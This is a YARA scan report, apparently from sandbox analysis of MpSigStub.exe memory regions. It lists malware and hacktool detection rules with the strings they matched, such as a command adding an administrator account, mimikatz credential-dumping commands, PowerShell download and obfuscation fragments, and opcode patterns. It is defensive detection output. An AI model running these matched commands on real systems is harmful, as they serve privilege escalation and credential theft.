38.3.MpSigStub.exe.138be567efd.37.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xad25:$s1: stratum+tcp://
38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x74fe:$s1: stratum+tcp://
38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bd31742c.64.unpack	clearlog	Detects Fireball malware - file clearlog.dll	Florian Roth	0xe3eb:$s3: hhhhh.exe 0xe3d5:$s4: ttttt.exe 0xe3bf:$s6: cle.log.1
38.3.MpSigStub.exe.138be62480a.80.unpack	Gen_Net_LocalGroup_Administrators_Add_Command	Detects an executable that contains a command to add a user account to the local administrators group	Florian Roth	0x15885:$x1: Net localgroup Administrators D3g1d5 /add
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	Trojan_Win32_PlaKeylog_B	Keylogger component	Microsoft	0x3214f:$hook: C6 06 FF 46 C6 06 25 0x3215a:$dasm_engine: 80 C9 10 88 0E 8A CA 80 E1 07 43 88 56 03 80 F9 05
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	APT_DNSpionage_Karkoff_Malware_Apr19_1	Detects DNSpionage Karkoff malware	Florian Roth	0x33c3e:$x3: rimrun.com
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x345ba:$s15: [+] OK! I Closed The Two Socket.
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	SUSP_DropperBackdoor_Keywords	Detects suspicious keywords that indicate a backdoor	Florian Roth	0x33c1d:$x4: DropperBackdoor
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	APT_APT41_POISONPLUG	Detects APT41 malware POISONPLUG	Florian Roth	0x22e67:$s2: [-]write failed[%d] 0x22e55:$s3: [-]load failed
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x36449:$s5: emailAddress= 0x36439:$s7: www.naver.com 0x36408:$x2: reykfgkodfgkfdskgdfogpdokgsdfpg 0x363ea:$x3: fjiejffndxklfsdkfjsaadiepwn
38.3.MpSigStub.exe.138be1451ae.105.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be1deebe.15.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x527d5:$x1: \Mini rat\
38.3.MpSigStub.exe.138be1deebe.15.unpack	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xf55f3:$r1: p^o^w^e^r^s^h^E^L^L 0xf55f3:$r2: p^o^w^e^r^s^h^E^L^L
38.3.MpSigStub.exe.138be1deebe.15.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x8c12c:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be1deebe.15.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x8c12c:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be1deebe.15.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x8ca9c:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be1deebe.15.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x8ca9c:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be1deebe.15.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0xc620:$r2: nuR\noisreVtnerruC
38.3.MpSigStub.exe.138be1deebe.15.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be1deebe.15.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
38.3.MpSigStub.exe.138be1deebe.15.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x91bb6:$x1: \Mini rat\
38.3.MpSigStub.exe.138be19fadd.13.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x23c1b:$: Decrypt.txt
38.3.MpSigStub.exe.138be19fadd.13.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0xcb50d:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be19fadd.13.unpack	HackTool_Samples	Hacktool	unknown	0x36001:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
38.3.MpSigStub.exe.138be19fadd.13.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0xcb50d:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be19fadd.13.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0xcbe7d:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be19fadd.13.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0xcbe7d:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be19fadd.13.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x39a3f:$e6: exe.dmc 0x4ba01:$r2: nuR\noisreVtnerruC
38.3.MpSigStub.exe.138be19fadd.13.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
38.3.MpSigStub.exe.138be19fadd.13.unpack	MirageStrings	Mirage Identifying Strings	Seth Hardy	0x36cee:$: Neo,welcome to the desert of real.
38.3.MpSigStub.exe.138bce174da.16.raw.unpack	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x25ec3:$s2: system.net.webclient).downloadstring('http
38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack	GhostDragon_Gh0stRAT	Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report	Florian Roth	0x2108e:$x4: Http/1.1 403 Forbidden 0x2108e:$s5: Http/1.1 403 Forbidden
38.3.MpSigStub.exe.138bd8c206c.234.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x6c2d:$e3: exe.rerolpxe 0x3f5fe:$e6: exe.dmc 0x23749:$r2: nuR\noisreVtnerruC
38.3.MpSigStub.exe.138bd0acad5.154.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0x3710d:$: Decrypt.txt 0x36e13:$: DECRYPT.txt 0x383bc:$: DECRYPT.txt 0x38666:$: DECRYPT.txt
38.3.MpSigStub.exe.138bd0acad5.154.unpack	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x290e3:$sa1: -enc 0xa4cca:$sa1: -enc 0x290d9:$sb1: -w hidden 0x290be:$sc1: -nop 0xa4cbb:$sc1: -noP 0x290d3:$sd1: -noni 0x290c8:$se1: -ep bypass 0x290c3:$sf1: -sta 0xa4cc0:$sf1: -sta
38.3.MpSigStub.exe.138bd0acad5.154.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x535db:$e4: exe.erolpxei
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_Baldr	Yara detected Baldr	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_Knot	Yara detected Knot Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_Nephilim	Yara detected Nephilim Ransomware	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138bd0acad5.154.unpack	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x23329:$a: XTREME 0x23493:$a: XTREME 0x23293:$h: Xtreme RAT
38.3.MpSigStub.exe.138bd0acad5.154.unpack	korlia	unknown	Nick Hoffman	0xc7ec7:$d: 00 62 69 73 6F 6E 61 6C 00
38.3.MpSigStub.exe.138bcce2d87.168.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce2d87.168.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcce2d87.168.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcce2d87.168.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bde736d2.82.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x53a69:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x53c79:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
38.3.MpSigStub.exe.138bde736d2.82.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x53a69:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x53c79:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x53a69:$c1: Elevation:Administrator!new: 0x53c79:$c1: Elevation:Administrator!new: 0x53a10:$c6: ConsentPromptBehaviorAdmin 0x53c20:$c6: ConsentPromptBehaviorAdmin
38.3.MpSigStub.exe.138bde736d2.82.unpack	SUSP_PDB_Path_Keywords	Detects suspicious PDB paths	Florian Roth	0x555d6:$: Release\shellcode 0x555de:$: shellcode.pdb
38.3.MpSigStub.exe.138bde736d2.82.unpack	Certutil_Decode_OR_Download	Certutil Decode	Florian Roth	0x56119:$a1: certutil -decode
38.3.MpSigStub.exe.138bde736d2.82.unpack	Greenbug_Malware_4	Detects ISMDoor Backdoor	Florian Roth	0x4b8fb:$s5: invoke-psuacme
38.3.MpSigStub.exe.138bde736d2.82.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
38.3.MpSigStub.exe.138bcce32d4.166.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce32d4.166.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcce32d4.166.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcce32d4.166.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bcce2d87.73.unpack	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
38.3.MpSigStub.exe.138bcce2d87.73.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138bcce2d87.73.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
38.3.MpSigStub.exe.138bcce2d87.73.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x1910d:$e6: exe.dmc
38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth
38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0xd509:$x1: \Mini rat\
38.3.MpSigStub.exe.138be22418a.58.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x47ca7f:$xs1: WS2_32.dll 0x1732a0:$xs2: ReflectiveLoader 0x296db9:$xs2: ReflectiveLoader
38.3.MpSigStub.exe.138be22418a.58.unpack	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xb0327:$r1: p^o^w^e^r^s^h^E^L^L 0xb0327:$r2: p^o^w^e^r^s^h^E^L^L
38.3.MpSigStub.exe.138be22418a.58.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x1732a0:$x1: ReflectiveLoader 0x296db9:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138be22418a.58.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x3fb2ac:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
38.3.MpSigStub.exe.138be22418a.58.unpack	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x11724d:$x13: c:\windows\keylog.txt
38.3.MpSigStub.exe.138be22418a.58.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x46e60:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be22418a.58.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x3dfee8:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3dff43:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3e028f:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3e02ea:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3e2591:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
38.3.MpSigStub.exe.138be22418a.58.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x3f8a42:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x3f8a64:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
38.3.MpSigStub.exe.138be22418a.58.unpack	HKTL_NET_NAME_SharPyShell	Detects .NET red/black-team tools via name	Arnim Rupp	0x905b5:$name: SharPyShell 0x905cb:$name: SharPyShell 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.58.unpack	HKTL_NET_NAME_DotNetInject	Detects .NET red/black-team tools via name	Arnim Rupp	0x2981bd:$name: DotNetInject 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.58.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0xcd56:$name: ConfuserEx 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.58.unpack	HKTL_NET_NAME_ibombshell	Detects .NET red/black-team tools via name	Arnim Rupp	0x1b430b:$name: ibombshell 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.58.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x34efc0:$s5: iexplorer 0x4b0319:$s5: iexplorer 0x46e60:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be22418a.58.unpack	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x119833:$n1: file:// 0x1cf56a:$n1: file:// 0x1cf627:$n1: file:// 0x3463c3:$n1: file:// 0x36098d:$n1: file:// 0x41e5da:$n1: file:// 0x360e25:$ax2: 5.153.58.45
38.3.MpSigStub.exe.138be22418a.58.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2d5046:$s2: sekurlsa::wdigest 0x2d4f77:$s6: sekurlsa::livessp 0x2d4fbc:$s9: sekurlsa::process 0x2d5001:$s12: sekurlsa::tickets 0x2d4f32:$s15: sekurlsa::credman
38.3.MpSigStub.exe.138be22418a.58.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x4a66b5:$x1: sekurlsa::logonpasswords
38.3.MpSigStub.exe.138be22418a.58.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x477d0:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be22418a.58.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x185087:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
38.3.MpSigStub.exe.138be22418a.58.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x477d0:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be22418a.58.unpack	ROKRAT_Nov17_1	Detects ROKRAT malware	Florian Roth	0x48de16:$s1: \T+M\Result\DocPrint.pdb
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.58.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x3feedf:$: OnlineTime= 0x3fef1d:$: clientpath= 0x3fef2c:$: serverpath=
38.3.MpSigStub.exe.138be22418a.58.unpack	gh0st	unknown	https://github.com/jackcr/	0x11a6e5:$b: Gh0st Update
38.3.MpSigStub.exe.138be22418a.58.unpack	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0xe4f5b:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0xbf154:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0xe4f63:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x42fa9d:$klg8: [Home] 0x42fa87:$klg10: [Page Down] 0x42fa95:$klg11: [End] 0x1848b8:$klg15: [Print Screen] 0x3f0e1c:$klg15: [Print Screen]
38.3.MpSigStub.exe.138be22418a.26.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0xd509:$x1: \Mini rat\
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x47ca7f:$xs1: WS2_32.dll 0x1732a0:$xs2: ReflectiveLoader 0x296db9:$xs2: ReflectiveLoader
38.3.MpSigStub.exe.138be22418a.26.unpack	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xb0327:$r1: p^o^w^e^r^s^h^E^L^L 0xb0327:$r2: p^o^w^e^r^s^h^E^L^L
38.3.MpSigStub.exe.138be22418a.26.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x1732a0:$x1: ReflectiveLoader 0x296db9:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138be22418a.26.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x3fb2ac:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
38.3.MpSigStub.exe.138be22418a.26.unpack	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x11724d:$x13: c:\windows\keylog.txt
38.3.MpSigStub.exe.138be22418a.26.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x46e60:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be22418a.26.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x3dfee8:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3dff43:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3e028f:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3e02ea:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3e2591:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
38.3.MpSigStub.exe.138be22418a.26.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x3f8a42:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x3f8a64:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_NAME_SharPyShell	Detects .NET red/black-team tools via name	Arnim Rupp	0x905b5:$name: SharPyShell 0x905cb:$name: SharPyShell 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_NAME_DotNetInject	Detects .NET red/black-team tools via name	Arnim Rupp	0x2981bd:$name: DotNetInject 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.26.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0xcd56:$name: ConfuserEx 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_NAME_ibombshell	Detects .NET red/black-team tools via name	Arnim Rupp	0x1b430b:$name: ibombshell 0x415f90:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be22418a.26.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x34efc0:$s5: iexplorer 0x4b0319:$s5: iexplorer 0x46e60:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
38.3.MpSigStub.exe.138be22418a.26.unpack	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x119833:$n1: file:// 0x1cf56a:$n1: file:// 0x1cf627:$n1: file:// 0x3463c3:$n1: file:// 0x36098d:$n1: file:// 0x41e5da:$n1: file:// 0x360e25:$ax2: 5.153.58.45
38.3.MpSigStub.exe.138be22418a.26.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2d5046:$s2: sekurlsa::wdigest 0x2d4f77:$s6: sekurlsa::livessp 0x2d4fbc:$s9: sekurlsa::process 0x2d5001:$s12: sekurlsa::tickets 0x2d4f32:$s15: sekurlsa::credman
38.3.MpSigStub.exe.138be22418a.26.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x4a66b5:$x1: sekurlsa::logonpasswords
